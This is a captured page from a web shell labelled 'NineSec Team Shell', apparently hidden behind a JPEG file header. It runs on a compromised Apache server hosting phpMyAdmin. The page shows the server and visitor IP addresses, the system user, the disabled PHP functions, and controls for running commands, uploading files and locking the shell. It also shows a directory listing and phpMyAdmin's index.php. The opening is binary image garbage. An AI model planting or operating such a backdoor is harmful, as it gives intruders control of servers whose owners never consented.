�����JFIF��������(ICC_PROFILE���������mntrRGB XYZ ������������acsp�������������������������������������-��������������������������������������������������� desc�������trXYZ��d���gXYZ��x���bXYZ������rTRC������(gTRC������(bTRC������(wtpt������cprt������ NineSec Team Shell
NineSec Team Shell
Server IP : 51.38.211.120  /  Your IP : 216.73.216.188
Web Server : Apache
System : Linux bob 5.15.85-1-pve #1 SMP PVE 5.15.85-1 (2023-02-01T00:00Z) x86_64
User : readytorun ( 1067)
PHP Version : 8.0.30
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF
Directory (0755) :  /home/readytorun/domains/demo.readytorun.it/public_html/phmad/

[  Home  ][  C0mmand  ][  Upload File  ][  Lock Shell  ][  Logout  ]

Current File : /home/readytorun/domains/demo.readytorun.it/public_html/phmad/index.php
<?php

declare(strict_types=1);

use PhpMyAdmin\Common;
use PhpMyAdmin\Routing;

if (! defined('ROOT_PATH')) {
    // phpcs:disable PSR1.Files.SideEffects
    define('ROOT_PATH', __DIR__ . DIRECTORY_SEPARATOR);
    // phpcs:enable
}

if (PHP_VERSION_ID < 70205) {
    die('<p>PHP 7.2.5+ is required.</p><p>Currently installed version is: ' . PHP_VERSION . '</p>');
}

// phpcs:disable PSR1.Files.SideEffects
define('PHPMYADMIN', true);
// phpcs:enable

require_once ROOT_PATH . 'libraries/constants.php';

/**
 * Activate autoloader
 */
if (! @is_readable(AUTOLOAD_FILE)) {
    die(
        '<p>File <samp>' . AUTOLOAD_FILE . '</samp> missing or not readable.</p>'
        . '<p>Most likely you did not run Composer to '
        . '<a href="https://docs.phpmyadmin.net/en/latest/setup.html#installing-from-git">'
        . 'install library files</a>.</p>'
    );
}

require AUTOLOAD_FILE;

global $route, $containerBuilder, $request;

Common::run();

$dispatcher = Routing::getDispatcher();
Routing::callControllerForRoute($request, $route, $dispatcher, $containerBuilder);

NineSec Team - 2022
Name
Size
Last Modified
Owner
Permissions
Options
..
--
December 20 2025 2:16:53
readytorun
0755
doc
--
September 11 2024 5:18:57
readytorun
0755
examples
--
September 11 2024 5:18:57
readytorun
0755
js
--
September 11 2024 5:18:57
readytorun
0755
libraries
--
September 11 2024 5:18:57
readytorun
0755
sql
--
September 11 2024 5:18:57
readytorun
0755
templates
--
September 11 2024 5:18:57
readytorun
0755
themes
--
September 11 2024 5:18:57
readytorun
0755
tmp
--
September 11 2024 5:18:57
readytorun
0755
vendor
--
September 11 2024 5:18:57
readytorun
0755
.htaccess
0.124 KB
November 14 2025 9:26:18
readytorun
0444
.rtlcssrc.json
0.02 KB
August 28 2023 5:01:54
readytorun
0777
CONTRIBUTING.md
2.526 KB
August 28 2023 5:01:54
readytorun
0777
ChangeLog
62.894 KB
August 28 2023 5:01:54
readytorun
0777
LICENSE
17.668 KB
August 28 2023 5:01:54
readytorun
0777
README
1.484 KB
August 28 2023 5:01:54
readytorun
0777
RELEASE-DATE-5.2.0
0.028 KB
August 28 2023 5:01:54
readytorun
0777
babel.config.json
0.067 KB
August 28 2023 5:01:54
readytorun
0777
composer.json
4.647 KB
August 28 2023 5:01:54
readytorun
0777
composer.lock
255.523 KB
August 28 2023 5:01:54
readytorun
0777
config.inc.php
70.987 KB
August 28 2023 5:01:54
readytorun
0777
config.sample.inc.php
4.667 KB
August 28 2023 5:01:54
readytorun
0777
favicon.ico
21.959 KB
August 28 2023 5:01:54
readytorun
0777
index.php
1.049 KB
August 28 2023 5:01:54
readytorun
0777
package.json
2.72 KB
August 28 2023 5:01:54
readytorun
0777
robots.txt
0.025 KB
August 28 2023 5:01:54
readytorun
0777
show_config_errors.php
1.126 KB
August 28 2023 5:01:54
readytorun
0777
url.php
0.942 KB
August 28 2023 5:01:54
readytorun
0777
yarn.lock
243.229 KB
August 28 2023 5:01:54
readytorun
0777

NineSec Team - 2022